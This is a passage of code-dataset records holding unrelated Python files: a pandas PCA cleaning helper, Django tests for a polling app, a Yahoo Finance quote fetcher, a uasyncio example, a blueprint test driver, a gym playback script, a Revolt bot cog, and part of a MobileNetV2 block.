use original.\n\n# FIXME-Ellen:\n# getting error -> Midas/data_cleaning.py:162:17: F821 undefined name 'nonpca_features_df'\ndef dimensionality_reduction_using_PCA(in_df, variance_retained):\n in_data = in_df.copy()\n if variance_retained > 0:\n features = list(in_data)\n scaler = preprocessing.StandardScaler()\n pca = PCA(variance_retained)\n pca_df = pd.DataFrame(index=in_data.index)\n for feature in features:\n if is_numeric_dtype(in_data[feature]) and in_data[feature].nunique() > 2:\n pca_df[feature] = scaler.fit_transform(in_data[feature].to_frame())\n else:\n nonpca_features_df[feature] = in_data[feature]\n pca.fit(pca_df)\n pca_df = pca.transform(pca_df)\n print(\"number of components = \", pca.n_components_)\n return pd.concat([nonpca_features_df, pca_df], axis=1)\n else:\n return in_data\n\n\n# def suggest_dtypes(collection, db=\"raw_data\"):\n\n# mongo_conn = MongoClient(**mongo_connection_info)\n# df = mongo_to_df(mongo_conn[db], collection)\n# # Do analysis here to suggest type labels for features\n# return {\n\n# }\n\n\n\"\"\" TESTING\n\ntrain_transaction = pd.read_csv('train_transaction.csv', index_col=0)\ntrain_id = pd.read_csv('train_identity.csv', index_col=0)\nin_df = train_transaction.merge(\n train_id, how='left', left_on='TransactionID', right_on='TransactionID')\n\n\n#a = remove_outliers(in_df,'obs')\n#b = remove_outliers(in_df,'values')\n#c = standardize_numeric_features(in_df)\n#d = dimensionality_reduction_using_PCA(in_df, .95)\n\n# initialize list of lists\ndata = [[3, 10, 5],\n [5, 15, 6],\n [2, 99, 3],\n [3, 11, 4],\n [3, 13, 3],\n [5, 14, 5],\n [3, 10, 5],\n [-10, 15, 6],\n [2, 14, 3],\n [3, 11, 4],\n [3, 13, 3],\n [5, 14, 5]\n ]\n\n# Create the pandas DataFrame\ndf = pd.DataFrame(data, columns = ['a', 'b', 'c'])\n\nremove_outliers(df, 'obs')\n\nstandardize_numeric_features(df)\n\ndimensionality_reduction_using_PCA(df, .95)\n\"\"\"\n","sub_path":"Midas/data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":7308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"139853487","text":"from __future__ import absolute_import, unicode_literals\n\nimport json\n\nfrom dateutil.relativedelta import relativedelta\nfrom django.contrib.auth.models import User\nfrom django.core.urlresolvers import reverse\nfrom django.test.utils import override_settings\nfrom django.utils import timezone\nfrom mock import patch\nfrom temba.types import Contact as TembaContact, Group as TembaGroup\nfrom tracpro.contacts.models import Contact\nfrom tracpro.groups.models import Region, Group\nfrom tracpro.polls.models import Issue, Response, RESPONSE_COMPLETE, RESPONSE_PARTIAL, RESPONSE_EMPTY\nfrom tracpro.test import TracProTest\n\n\nclass RegionTest(TracProTest):\n def test_create(self):\n zabul = Region.create(self.unicef, \"Zabul\", 'G-101')\n jan = self.create_contact(self.unicef, \"Jan\", 'tel:1234', zabul, self.group1, 'C-101')\n bob = User.create(self.unicef, \"Bob\", \"bob@unicef.org\", \"pass\", False, [zabul])\n\n self.assertEqual(zabul.org, self.unicef)\n self.assertEqual(zabul.name, \"Zabul\")\n self.assertEqual(zabul.uuid, 'G-101')\n self.assertEqual(list(zabul.get_contacts()), [jan])\n self.assertEqual(list(zabul.get_users()), [bob])\n\n def test_get_all(self):\n self.assertEqual(len(Region.get_all(self.unicef)), 3)\n self.assertEqual(len(Region.get_all(self.nyaruka)), 1)\n\n @override_settings(CELERY_ALWAYS_EAGER=True, CELERY_EAGER_PROPAGATES_EXCEPTIONS=True, BROKER_BACKEND='memory')\n 
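Note on the data_cleaning snippet above: the FIXME is accurate. `dimensionality_reduction_using_PCA` assigns into `nonpca_features_df` before ever creating it, and `pca.transform` returns an ndarray that is then concatenated with a DataFrame. A sketch of a fixed version; the `pc0..pcN` column names are an invented convention, not the module's:

import pandas as pd
from pandas.api.types import is_numeric_dtype
from sklearn import preprocessing
from sklearn.decomposition import PCA

def reduce_with_pca(in_df, variance_retained):
    in_data = in_df.copy()
    if variance_retained <= 0:
        return in_data
    pca_df = pd.DataFrame(index=in_data.index)
    nonpca_df = pd.DataFrame(index=in_data.index)   # was never initialized
    scaler = preprocessing.StandardScaler()
    for feature in in_data:
        if is_numeric_dtype(in_data[feature]) and in_data[feature].nunique() > 2:
            pca_df[feature] = scaler.fit_transform(in_data[feature].to_frame())
        else:
            nonpca_df[feature] = in_data[feature]
    components = PCA(variance_retained).fit_transform(pca_df)   # still needs imputed data
    comp_df = pd.DataFrame(components, index=in_data.index,
                           columns=["pc%d" % i for i in range(components.shape[1])])
    return pd.concat([nonpca_df, comp_df], axis=1)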
@patch('dash.orgs.models.TembaClient.get_groups')\n @patch('dash.orgs.models.TembaClient.get_contacts')\n def test_sync_with_groups(self, mock_get_contacts, mock_get_groups):\n mock_get_groups.return_value = [TembaGroup.create(uuid='G-101', name=\"New region\", size=2),\n TembaGroup.create(uuid='G-102', name=\"Other region\", size=1)]\n mock_get_contacts.return_value = [\n TembaContact.create(uuid='C-101', name=\"Jan\", urns=['tel:123'], groups=['G-101', 'G-005'],\n fields=dict(chat_name=\"jan\"), language='eng', modified_on=timezone.now()),\n TembaContact.create(uuid='C-102', name=\"Ken\", urns=['tel:234'], groups=['G-101', 'G-006'],\n fields=dict(chat_name=\"ken\"), language='eng', modified_on=timezone.now())\n ]\n\n # select one new group\n Region.sync_with_groups(self.unicef, ['G-101'])\n self.assertEqual(self.unicef.regions.filter(is_active=True).count(), 1)\n self.assertEqual(self.unicef.regions.filter(is_active=False).count(), 3) # existing de-activated\n\n new_region = Region.objects.get(uuid='G-101')\n self.assertEqual(new_region.name, \"New region\")\n self.assertTrue(new_region.is_active)\n\n # check contact changes\n self.assertEqual(self.unicef.contacts.filter(is_active=True).count(), 2)\n self.assertEqual(self.unicef.contacts.filter(is_active=False).count(), 5) # existing de-activated\n\n jan = Contact.objects.get(uuid='C-101')\n self.assertEqual(jan.name, \"Jan\")\n self.assertEqual(jan.urn, 'tel:123')\n self.assertEqual(jan.region, new_region)\n self.assertTrue(jan.is_active)\n\n # change group and contacts on chatpro side\n Region.objects.filter(name=\"New region\").update(name=\"Huh?\", is_active=False)\n jan.name = \"Janet\"\n jan.save()\n Contact.objects.filter(name=\"Ken\").update(is_active=False)\n\n # re-select new group\n Region.sync_with_groups(self.unicef, ['G-101'])\n\n # local changes should be overwritten\n self.assertEqual(self.unicef.regions.get(is_active=True).name, 'New region')\n self.assertEqual(self.unicef.contacts.filter(is_active=True).count(), 2)\n Contact.objects.get(name=\"Jan\", is_active=True)\n\n\nclass GroupTest(TracProTest):\n def test_create(self):\n group = Group.create(self.unicef, \"Male Teachers\", 'G-101')\n self.assertEqual(group.org, self.unicef)\n self.assertEqual(group.name, \"Male Teachers\")\n self.assertEqual(group.uuid, 'G-101')\n\n def test_get_all(self):\n self.assertEqual(len(Group.get_all(self.unicef)), 3)\n self.assertEqual(len(Group.get_all(self.nyaruka)), 1)\n\n\nclass RegionCRUDLTest(TracProTest):\n def test_list(self):\n url = reverse('groups.region_list')\n\n # log in as a non-administrator\n self.login(self.user1)\n\n response = self.url_get('unicef', url)\n self.assertRedirects(response, 'http://unicef.localhost/users/login/?next=/region/')\n\n # log in as an administrator\n self.login(self.admin)\n\n response = self.url_get('unicef', url)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.context['object_list']), 3)\n\n def test_most_active(self):\n url = reverse('groups.region_most_active')\n\n five_weeks_ago = timezone.now() - relativedelta(weeks=5)\n five_days_ago = timezone.now() - relativedelta(days=5)\n issue = Issue.objects.create(poll=self.poll1, conducted_on=five_weeks_ago)\n\n # empty response in last month for contact in region #1\n Response.objects.create(flow_run_id=123, issue=issue, contact=self.contact1,\n created_on=five_days_ago, updated_on=five_days_ago, status=RESPONSE_EMPTY)\n\n # partial response not in last month for contact in region #2\n 
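Note on the most_active tests in this module: the response-creation calls here and below repeat the same five-argument shape with only the ids, contact, and status changing. A refactor sketch of a small factory for the test module (runnable only inside it, since it uses the module's own imports):

def make_response(issue, contact, when, status, run_id):
    return Response.objects.create(
        flow_run_id=run_id, issue=issue, contact=contact,
        created_on=when, updated_on=when, status=status)

# e.g. make_response(issue, self.contact5, five_days_ago, RESPONSE_COMPLETE, 456)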
Response.objects.create(flow_run_id=234, issue=issue, contact=self.contact4,\n created_on=five_weeks_ago, updated_on=five_weeks_ago, status=RESPONSE_PARTIAL)\n\n # partial response in last month for contact in region #2\n Response.objects.create(flow_run_id=345, issue=issue, contact=self.contact4,\n created_on=five_days_ago, updated_on=five_days_ago, status=RESPONSE_PARTIAL)\n\n # 2 complete responses in last month for contact in region #3\n Response.objects.create(flow_run_id=456, issue=issue, contact=self.contact5,\n created_on=five_days_ago, updated_on=five_days_ago, status=RESPONSE_COMPLETE)\n Response.objects.create(flow_run_id=567, issue=issue, contact=self.contact5,\n created_on=five_days_ago, updated_on=five_days_ago, status=RESPONSE_COMPLETE)\n\n # log in as a non-administrator\n self.login(self.user1)\n\n response = self.url_get('unicef', url)\n results = json.loads(response.content)['results']\n self.assertEqual(len(results), 2)\n self.assertEqual(results[0]['id'], self.region3.pk)\n self.assertEqual(results[0]['name'], self.region3.name)\n self.assertEqual(results[0]['response_count'], 2)\n self.assertEqual(results[1]['id'], self.region2.pk)\n self.assertEqual(results[1]['name'], self.region2.name)\n self.assertEqual(results[1]['response_count'], 1)\n\n\nclass GroupCRUDLTest(TracProTest):\n def test_list(self):\n url = reverse('groups.group_list')\n\n # log in as a non-administrator\n self.login(self.user1)\n\n response = self.url_get('unicef', url)\n self.assertRedirects(response, 'http://unicef.localhost/users/login/?next=/group/')\n\n # log in as an administrator\n self.login(self.admin)\n\n response = self.url_get('unicef', url)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.context['object_list']), 3)\n\n def test_most_active(self):\n url = reverse('groups.group_most_active')\n\n five_weeks_ago = timezone.now() - relativedelta(weeks=5)\n five_days_ago = timezone.now() - relativedelta(days=5)\n issue = Issue.objects.create(poll=self.poll1, conducted_on=five_weeks_ago)\n\n # empty response in last month for contact in group #1\n Response.objects.create(flow_run_id=123, issue=issue, contact=self.contact1,\n created_on=five_days_ago, updated_on=five_days_ago, status=RESPONSE_EMPTY)\n\n # partial response not in last month for contact in group #2\n Response.objects.create(flow_run_id=234, issue=issue, contact=self.contact3,\n created_on=five_weeks_ago, updated_on=five_weeks_ago, status=RESPONSE_PARTIAL)\n\n # partial response in last month for contact in group #2\n Response.objects.create(flow_run_id=345, issue=issue, contact=self.contact3,\n created_on=five_days_ago, updated_on=five_days_ago, status=RESPONSE_PARTIAL)\n\n # 2 complete responses in last month for contact in group #3\n Response.objects.create(flow_run_id=456, issue=issue, contact=self.contact5,\n created_on=five_days_ago, updated_on=five_days_ago, status=RESPONSE_COMPLETE)\n Response.objects.create(flow_run_id=567, issue=issue, contact=self.contact5,\n created_on=five_days_ago, updated_on=five_days_ago, status=RESPONSE_COMPLETE)\n\n # log in as a non-administrator\n self.login(self.user1)\n\n response = self.url_get('unicef', url)\n results = json.loads(response.content)['results']\n self.assertEqual(len(results), 2)\n self.assertEqual(results[0]['id'], self.group3.pk)\n self.assertEqual(results[0]['name'], self.group3.name)\n self.assertEqual(results[0]['response_count'], 2)\n self.assertEqual(results[1]['id'], self.group2.pk)\n self.assertEqual(results[1]['name'], 
self.group2.name)\n self.assertEqual(results[1]['response_count'], 1)\n\n\nclass UserRegionsMiddlewareTest(TracProTest):\n def test_process_request(self):\n # make anonymous request to home page\n response = self.url_get('unicef', reverse('home.home'))\n self.assertEqual(response.status_code, 302)\n\n # admin user with implicit access to all regions\n self.login(self.admin)\n\n # default to \"All Regions\"\n response = self.url_get('unicef', reverse('home.home'))\n self.assertIsNone(self.client.session['region'])\n\n # check region menu...\n self.assertContains(response, \"Kandahar\", status_code=200)\n self.assertContains(response, \"Khost\")\n self.assertContains(response, \"Kunar\")\n self.assertContains(response, \"All Regions\")\n\n # should come from session this time\n self.url_get('unicef', reverse('home.home'))\n self.assertIsNone(self.client.session['region'])\n\n # any page allows region to be set via _region param\n self.url_get('unicef', reverse('home.home'), {'_region': self.region3.pk})\n self.assertEqual(self.client.session['region'], self.region3.pk)\n\n # can set to region to 0 meaning \"All Regions\"\n self.url_get('unicef', reverse('home.home'), {'_region': 0})\n self.assertIsNone(self.client.session['region'])\n\n # user with access to 2 regions (#2 and #3)\n self.login(self.user2)\n\n # default to first region A-Z\n response = self.url_get('unicef', reverse('home.home'))\n self.assertEqual(self.client.session['region'], self.region2.pk)\n\n # check region menu...\n self.assertContains(response, \"Khost\", status_code=200)\n self.assertContains(response, \"Kunar\")\n self.assertNotContains(response, \"All Regions\")\n\n # can't set to region that user doesn't have access, so defaults back to first\n self.url_get('unicef', reverse('home.home'), {'_region': self.region1.pk})\n self.assertEqual(self.client.session['region'], self.region2.pk)\n\n # user with access to only 1 region\n self.login(self.user1)\n\n # user only has access to region #1 so should default to region #1\n response = self.url_get('unicef', reverse('home.home'))\n self.assertEqual(self.client.session['region'], self.region1.pk)\n\n # no region menu, just region name\n self.assertContains(response, \"Kandahar\", status_code=200)\n self.assertNotContains(response, \"All Regions\")\n","sub_path":"tracpro/groups/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":12019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"454397992","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\djutil\\context_processors.py\n# Compiled at: 2013-08-27 09:18:22\nfrom __future__ import unicode_literals\nfrom django.conf import settings\nfrom django.utils import dateformat\n\ndef analytics(request):\n return {b'ga_tracking_id': getattr(settings, b'GA_TRACKING_ID', b''), \n b'ga_tracking_domain': getattr(settings, b'GA_TRACKING_DOMAIN', b'')}\n\n\ndef version_string(request):\n revision_hash = getattr(settings, b'REVISION_HASH', b'')\n revision_date = getattr(settings, b'REVISION_DATE', b'')\n if revision_date:\n try:\n revision_date = dateformat.format(revision_date, b'j M, G:i')\n except:\n revision_date = b''\n\n revision_env = getattr(settings, b'REVISION_ENV', b'')\n if revision_env:\n revision_env = b', ' + revision_env\n if revision_hash and revision_date:\n version = (b'v. 
{} ({}{})').format(revision_date, revision_hash, revision_env)\n else:\n version = b''\n return {b'VERSION_STRING': version}","sub_path":"pycfiles/djutil-0.2-py2.7/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"650720202","text":"import urllib2\nimport csv\nimport time\nimport random_stock_tickers\nimport controller\n\nclass YahooFinanceAPIHandler():\n\n def __init__(self, stock_tickers_list, stats_wanted_list):\n self.stock_tickers_list = stock_tickers_list\n self.stats_wanted_list = stats_wanted_list\n self.stat_dict = {\"ask\":\"a\",\n \"average_daily_volume\":\"a2\",\n \"bid\":\"b\",\n \"previous_close\":\"p\",\n \"open\":\"o\",\n \"day_low\":\"g\",\n \"day_high\":\"h\",\n \"day_value_change\":\"w4\",\n \"last_trade\":\"l1\",\n \"last_trade_date\":\"d1\",\n \"last_trade_time\":\"t1\",\n \"52_week_high\":\"k\",\n \"52_week_low\":\"j\",\n \"52_week_range\":\"w\",\n \"dividend_yield\":\"y\",\n \"dividend_per_share\":\"d\",\n \"dividend_pay_date\":\"r1\",\n \"ex_dividend_date\":\"q\",\n \"market_cap\":\"j1\",\n \"name\":\"n\",\n \"revenue\":\"s6\",\n \"symbol\":\"s\",\n \"stock_exchange\":\"x\",\n \"shares_outstanding\":\"j2\",\n \"eps\":\"e\",\n \"ebitda\":\"j4\",\n \"pe\":\"r\"\n }\n\n def create_url(self):\n stock_tickers = self.stock_tickers_list\n stats_wanted_list = self.stats_wanted_list\n stat_dict = self.stat_dict\n url = \"http://finance.yahoo.com/d/quotes.csv?s=\"\n for ticker in stock_tickers:\n if ticker != stock_tickers[-1]:\n url += ticker + \"+\"\n else:\n url += ticker + \"&f=\"\n for stat in stats_wanted_list:\n url += stat_dict[stat]\n return url\n\n def get_unvalidated_stock_table(self):\n url = self.create_url()\n table = []\n while controller.Controller().can_connect_to_url(url) == False:\n time.sleep(60)\n response = urllib2.urlopen(url)\n document = csv.reader(response)\n for row in document:\n table.append(row)\n response.close()\n return table\n\n #this function invalidates a row if ALL entries == \"N/A\"\n \"\"\"def create_validated_table(self):\n unvalidated_table = self.get_unvalidated_stock_table()\n invalid_rows = []\n modified_table = []\n for row in unvalidated_table:\n match_count = 0\n for entry in row:\n if entry == \"N/A\":\n match_count += 1\n if match_count == len(row) - 1:\n invalid_rows.append(row)\n for row in unvalidated_table:\n if row not in invalid_rows:\n modified_table.append(row)\n return modified_table\"\"\"\n\n #this functions invalidates a row if ANY of the entries == \"N/A\"\n def create_validated_table(self):\n unvalidated_table = self.get_unvalidated_stock_table()\n invalid_rows = []\n modified_table = []\n for row in unvalidated_table:\n for entry in row:\n if entry == \"N/A\":\n invalid_rows.append(row)\n for row in unvalidated_table:\n if row not in invalid_rows:\n modified_table.append(row)\n return modified_table\n\n #create_formatted_data returns stock data in a readable format\n def create_formatted_data(self):\n validated_table = self.create_validated_table()\n stats_wanted = self.stats_wanted_list\n text = \"\"\n for row in validated_table:\n for i in range(0, len(stats_wanted)):\n text += stats_wanted[i].upper().replace(\"_\",\" \") + \": \" + row[i].upper() + \"\\n\"\n text += \"\\n\"\n return 
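Note on the decompiled context_processors snippet above: it mixes `unicode_literals` with b'' prefixes (an uncompyle artifact of the Python 2.7 bytecode), and on Python 3 `bytes` has no `.format()`, so `version_string` would raise AttributeError there; the bare `except:` also swallows real errors. A runnable str-based sketch of the same logic:

def build_version_string(revision_hash, revision_date, revision_env):
    env = ", " + revision_env if revision_env else ""
    if revision_hash and revision_date:
        return "v. {} ({}{})".format(revision_date, revision_hash, env)
    return ""

print(build_version_string("a1b2c3", "27 Aug, 09:18", "prod"))
# -> v. 27 Aug, 09:18 (a1b2c3, prod)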
text\n","sub_path":"yahoo_finance_api_handler.py","file_name":"yahoo_finance_api_handler.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"554921848","text":"import uasyncio as asyncio\nfrom uasyncio import Event\n\nasync def waiter(event):\n print('Waiting for event')\n await event.wait() # Pause here until event is set\n print('Waiter got event.')\n event.clear() # Flag caller and enable re-use of the event\n\nasync def main():\n event = Event()\n asyncio.create_task(waiter(event))\n await asyncio.sleep(2)\n print('Setting event')\n event.set()\n await asyncio.sleep(1)\n # Caller can check if event has been cleared\n print('Event is {}'.format('set' if event.is_set() else 'clear'))\n\nasyncio.run(main())","sub_path":"Experimental_exercise/uasyncio_test/3.2 Event.py","file_name":"3.2 Event.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"135211199","text":"import threading\nimport queue\nfrom CreateBluePrint import CreateBluePrint\nfrom RequestCockpitAPI import RequestCockpitAPI\nfrom cockpit_testing.Framework.utils.utils import BaseTest\nimport time, traceback, sys\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-b', help='Run list of blueprints', dest='bpName', action='store', default=[], nargs='+')\n parser.add_argument('-d', help='Run blueprints in a specific directory', dest='bpDirectory', default='', action='store')\n parser.add_argument('-a', help='Use a specific account', dest='account', default='', action='store')\n parser.add_argument('--clone', help=\"Clone blueprints templates' repo\", dest='clone', default=False, action='store_true')\n parser.add_argument('--teardown', help='Delete the account', dest='teardown', default=False, action='store_true')\n parser.add_argument('--no-backend', help='No backend environment', dest='no_backend', default=False,\n action='store_true')\n options = parser.parse_args()\n\n print(' [*] Driver is running ..... ')\n base_test = BaseTest()\n base_test.log('Driver.log')\n base_test.check_cockpit_is_exist()\n\n THREADS_NUMBER = int(base_test.values['threads_number'])\n BLUEPRINT_NAME = options.bpName\n\n create_blueprint = CreateBluePrint(clone=options.clone, no_backend=options.no_backend, bp_dir=options.bpDirectory)\n if options.account:\n create_blueprint.values['account'] = options.account\n elif not options.no_backend:\n create_blueprint.create_account()\n\n create_blueprint.create_blueprint()\n role = {} # {'Thread_name : [ [role_name, service], [role_name, service], .. 
]}\n\n\n def get_testService_role(blueprint, thread_name):\n global role\n index = []\n blueprint = blueprint.splitlines()\n for line in blueprint:\n if 'test_' == line[:5]:\n index.append(blueprint.index(line))\n\n if len(index) == 0:\n raise NameError(\"The blueprint doesn't have any test roles.\")\n\n role[thread_name] = []\n for i in index:\n role_line = blueprint[i]\n role_name = role_line[:role_line.find('__')]\n role_service = role_line[role_line.find('__') + 2:-1]\n role[thread_name].append([role_name, role_service])\n\n\n queue = queue.Queue()\n jobs = base_test.get_jobs(BLUEPRINT_NAME)\n for job in jobs:\n queue.put(job)\n\n\n def work():\n while not queue.empty():\n testCasesPath = queue.get()\n bpFileName = testCasesPath[testCasesPath.index('/TestCases/') + 11:]\n print(('\\n [*] Test case : %s' % bpFileName))\n base_test.logging.info('\\n')\n base_test.logging.info('[*] Test case : %s' % bpFileName)\n\n try:\n blueprint = create_blueprint.load_blueprint(testCasesPath=testCasesPath)\n get_testService_role(blueprint=blueprint, thread_name=threading.current_thread().name)\n request_cockpit_api = RequestCockpitAPI()\n request_cockpit_api.create_new_repository(repository=request_cockpit_api.repo['name'])\n request_cockpit_api.send_blueprint(repository=request_cockpit_api.repo['name'],\n blueprint=blueprint)\n\n request_cockpit_api.execute_blueprint(repository=request_cockpit_api.repo['name'],\n blueprint=request_cockpit_api.blueprint['name'])\n request_cockpit_api.run_repository(repository=request_cockpit_api.repo['name'])\n\n testCase_time = request_cockpit_api.get_run_status(repository=request_cockpit_api.repo['name'],\n run_key=request_cockpit_api.repo['key'],\n bpFileName=bpFileName)\n if testCase_time:\n base_test.Testcases_results[bpFileName] = []\n base_test.Testcases_results[bpFileName].append(['TestCase Time', testCase_time])\n for role_item in role[threading.current_thread().name]:\n base_test.Testcases_results[\n bpFileName].append(request_cockpit_api.get_service_data(\n repository=request_cockpit_api.repo['name'],\n role=role_item[0],\n service=role_item[1]))\n else:\n request_cockpit_api.testcase_time = '{:0.2f}'.format(time.time() - request_cockpit_api.start_time)\n error_message = 'ERROR : %s %s' % (\n request_cockpit_api.blueprint['name'], request_cockpit_api.blueprint['log'])\n base_test.Testcases_results[bpFileName] = [['TestCase Time', request_cockpit_api.testcase_time],\n [error_message, role[threading.current_thread().name][0]]]\n except:\n base_test.logging.error(traceback.format_exc())\n\n # Add error message to xml result\n error_message = 'ERROR : %s %s' % (traceback.format_exc(), request_cockpit_api.response_error_content)\n base_test.Testcases_results[bpFileName] = [['TestCase Time', 0], [error_message, 'Unknown service']]\n\n request_cockpit_api.clean_cockpit()\n queue.task_done()\n\n\n for _ in range(THREADS_NUMBER):\n threading.Thread(target=work).start()\n\n queue.join()\n base_test.generate_xml_results()\n if options.teardown:\n create_blueprint.teardown()\n","sub_path":"cockpit_testing/Framework/Driver/Driver.py","file_name":"Driver.py","file_ext":"py","file_size_in_byte":5731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"470530314","text":"import gym\nimport os\nfrom time import sleep\nfrom evolutionary_algorithm.ea.eamain import ConvolutionalNeuralNetwork, SimpleNeuralNetwork\nfrom evolutionary_algorithm.ea.gym_wrapper import RamGymWrapper, MainGymWrapper\nENV_NAME = 
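Note on the Driver.py snippet above: `blueprint.index(line)` returns the first occurrence, so two identical `test_...` lines collect the same index twice; iterating with `enumerate` keeps each line's own position. (Separately, `queue = queue.Queue()` shadows the `queue` module and is worth renaming.) A runnable sketch:

def get_test_role_indices(blueprint_text):
    # enumerate preserves each line's position, even for duplicate lines
    return [i for i, line in enumerate(blueprint_text.splitlines())
            if line.startswith('test_')]

print(get_test_role_indices("a\ntest_x__svc)\nb\ntest_x__svc)"))   # [1, 3]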
\"SpaceInvaders-ramNoFrameskip-v4\"\nRAM = True\nMODEL_USED = \"SIMPLE\"\nLOAD_WEIGHTS_PATH = str(os.path.dirname(__file__) + \"/models/\" + ENV_NAME + \"/\" + \"2020-02-20_04-35\" + \"-model.h5\")\n\n\nif RAM:\n env = RamGymWrapper.wrap(gym.make(ENV_NAME))\nelse:\n env = MainGymWrapper.wrap(gym.make(ENV_NAME))\n\nif MODEL_USED == \"SIMPLE\":\n model = SimpleNeuralNetwork((4, 128), env.action_space.n, filepath=LOAD_WEIGHTS_PATH)\nelse:\n model = ConvolutionalNeuralNetwork((4, 84, 84), env.action_space.n, filepath=LOAD_WEIGHTS_PATH)\n\nterminated = False\nstate = env.reset()\ntotal_reward = 0\n\nwhile not terminated:\n action = model.predict(state)\n state, reward, terminated,_ = env.step(action)\n total_reward += reward\n env.render()\n sleep(0.01)\n\nprint(\"Final reward: \" + str(total_reward))\n","sub_path":"evolutionary_algorithm/ea/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"274700055","text":"import voltage\r\nimport asyncio\r\nimport json\r\nimport datetime\r\nimport time\r\n\r\nfrom voltage.ext import commands\r\n\r\n\r\ndef setup(client) -> commands.Cog:\r\n\r\n owner = commands.Cog(\"Owner\")\r\n\r\n\r\n @owner.command(description=\"Change the presence or status of Ikusei!\")\r\n async def status(ctx, *, status, presence=None):\r\n if ctx.author.id in [\r\n \"01H2YMK1VSZM0X4GJAAC7X48TN\",\r\n \"01H213M511VS2W8HMAHHVCSBPT\",\r\n ]:\r\n if not presence:\r\n await client.set_status(status, voltage.PresenceType.online)\r\n return await ctx.send(f\"Changed status to `{status}`\")\r\n else:\r\n if presence.lower() == \"online\":\r\n await client.set_status(status, voltage.PresenceType.online)\r\n return await ctx.send(\r\n f\"Changed status to `{status}` and a presence of `Online!`\"\r\n )\r\n elif presence.lower() == \"idle\":\r\n await client.set_status(status, voltage.PresenceType.idle)\r\n return await ctx.send(\r\n f\"Changed status to `{status}` and a presence of `Idle`!\"\r\n )\r\n elif presence.lower() == \"dnd\" or \"busy\":\r\n await client.set_status(status, voltage.PresenceType.busy)\r\n return await ctx.send(\r\n f\"Changed status to `{status}` and a presence of `Do Not Disturb`!\"\r\n )\r\n else:\r\n return await ctx.send(\"You aren't an owner of this bot!\")\r\n\r\n @owner.command()\r\n async def test(ctx):\r\n embed = voltage.ImageEmbed(url=\"https://i.imgur.com/3LljFXC.jpeg\")\r\n await ctx.send(content=\"[]()\", embed=embed)\r\n\r\n @owner.command(description=\"Test our command\")\r\n async def register(ctx):\r\n\r\n with open(\"json/users.json\", \"r\") as f:\r\n data = json.load(f)\r\n if ctx.author.id in data:\r\n return await ctx.send(\"You're already registered!\")\r\n with open(\"json/users.json\", \"w\") as f:\r\n data[ctx.author.id] = {\r\n \"username\": ctx.author.name,\r\n \"id\": ctx.author.id,\r\n \"bio\": \"User has no bio set!\",\r\n \"beta\": \"False\",\r\n \"ff\": \"False\",\r\n \"notifications\": []\r\n }\r\n json.dump(data, f, indent=2)\r\n embed = voltage.SendableEmbed(description=\"## You're registered!\")\r\n await ctx.send(content=\"[]()\", embed=embed)\r\n\r\n\r\n @owner.command(description=\"Use this after registering\")\r\n async def ar(ctx):\r\n with open(\"json/users.json\", \"r\") as f:\r\n data = json.load(f)\r\n embed = voltage.SendableEmbed(\r\n description=f\"{data[ctx.author.id]['username']}'s profile:\\n\\n**Bio:**\\n{data[ctx.author.id]['bio']}\\n\\n**User's settings:**\\n\\nBeta: 
`{data[ctx.author.id]['beta']}`\\nFamily Friendly Mode: `{data[ctx.author.id]['ff']}`\"\r\n )\r\n await ctx.send(content=\"[]()\", embed=embed)\r\n\r\n return owner","sub_path":"cogs/owner.py","file_name":"owner.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"158128162","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@date: 2020/12/4 上午11:39\n@file: mobilenetv2_inverted_residual.py\n@author: zj\n@description: MobileNetV2 反向残差块\n\"\"\"\nfrom abc import ABC\n\nimport torch.nn as nn\n\n\nclass MobileNetV2InvertedResidual(nn.Module, ABC):\n \"\"\"\n MobileNetV2的反向残差块由一个膨胀卷积和一个深度可分离卷积(depth-wise conv + point-wise conv)组成\n 参考torchvision实现:\n 1. 当膨胀率大于1时,执行膨胀卷积操作;\n 2. 当深度卷积步长为1且输入/输出通道数相同时,执行残差连接\n 3. 反向残差块的最后不执行激活操作\n \"\"\"\n\n def __init__(self,\n # 输入通道数\n in_planes,\n # 输出通道数\n out_planes,\n # 膨胀因子\n expansion_rate=1,\n # 卷积层步长\n stride=1,\n # 卷积层零填充\n padding=1,\n # 卷积层类型\n conv_layer=None,\n # 归一化层类型\n norm_layer=None,\n # 激活层类型\n act_layer=None,\n ):\n super(MobileNetV2InvertedResidual, self).__init__()\n\n if conv_layer is None:\n conv_layer = nn.Conv2d\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n if act_layer is None:\n act_layer = nn.ReLU6\n\n # 计算隐藏层输入通道数\n hidden_planes = int(expansion_rate * in_planes)\n features = list()\n if expansion_rate != 1:\n features.append(nn.Sequential(\n conv_layer(in_planes, hidden_planes, kernel_size=1, stride=1, bias=False),\n norm_layer(hidden_planes),\n act_layer(inplace=True)\n ))\n\n # 深度卷积\n features.append(nn.Sequential(\n conv_layer(hidden_planes, hidden_planes, kernel_size=3, stride=stride, padding=padding, bias=False,\n groups=hidden_planes),\n norm_layer(hidden_planes),\n 